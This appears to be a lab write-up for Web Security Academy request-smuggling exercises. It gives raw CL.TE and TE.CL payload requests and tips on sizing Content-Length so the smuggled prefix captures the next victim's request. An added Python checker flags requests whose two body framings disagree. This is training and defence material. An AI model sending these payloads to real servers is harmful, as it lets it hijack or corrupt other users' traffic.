HTTP Request Smuggling

Bypass, XSS and more

CL.TE

POST / HTTP/1.1
Host: 0aa9006c0356f4eac12f806b00d70072.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: x

Note: Content-Length is auto-computed by Burp (shown in orange).

TE.CL

POST / HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

9e
GET /404 HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0


There are two newlines (Enter presses) after the final 0!

Note the two newlines on line 16 of the request, which end the chunked request. Disable Content-Length computation in the Burp Repeater settings.

The first Content-Length is 4 bytes, just enough to cover the chunk-size line (line 7; the chunk size is computed from the orange part).

The second Content-Length is set slightly above what its data requires, so that it overrides the next incoming victim's request.
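A defender-side check for the two request shapes above, as an added example that is not part of the original page: it parses a raw request and reports how many body bytes a Content-Length parser and a chunked parser would each consume, flagging any disagreement. The function names and the `example.test` host are assumptions, and chunk trailers are not handled.

```python
# Added example (not from the original page): compare both body framings.
HEX = b"0123456789abcdefABCDEF"

def parse_head(raw: bytes):
    """Split a raw request into a lowercase header dict and the body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def chunked_length(body: bytes):
    """Bytes a chunked parser consumes, or None if the chunking is malformed."""
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        token = body[pos:eol].split(b";")[0].strip() if eol >= 0 else b""
        if not token or any(c not in HEX for c in token):
            return None
        size = int(token, 16)
        pos = eol + 2
        if size == 0:
            # The zero chunk must be followed by an empty line (no trailers here).
            return pos + 2 if body[pos:pos + 2] == b"\r\n" else None
        pos += size + 2  # skip the chunk data and its trailing CRLF
        if pos > len(body):
            return None

def framing_report(raw: bytes):
    """Report both framings; 'desync' is True when they disagree."""
    headers, body = parse_head(raw)
    cl = headers.get(b"content-length")
    chunked = b"chunked" in headers.get(b"transfer-encoding", b"").lower()
    cl_len = int(cl) if cl is not None and cl.isdigit() else None
    te_len = chunked_length(body) if chunked else None
    both = cl_len is not None and chunked
    return {"both_headers": both, "cl_len": cl_len, "te_len": te_len,
            "desync": both and cl_len != te_len}

# Constructed sample: the CL.TE request shape above, with a placeholder host.
SAMPLE = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Length: 35\r\nTransfer-Encoding: chunked\r\n\r\n"
          b"0\r\n\r\nGET /404 HTTP/1.1\r\nX-Ignore: x")

if __name__ == "__main__":
    print(framing_report(SAMPLE))
```

A request with `both_headers` set is worth rejecting or logging at the front end even when the two lengths happen to agree, since the back end may still parse it differently.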
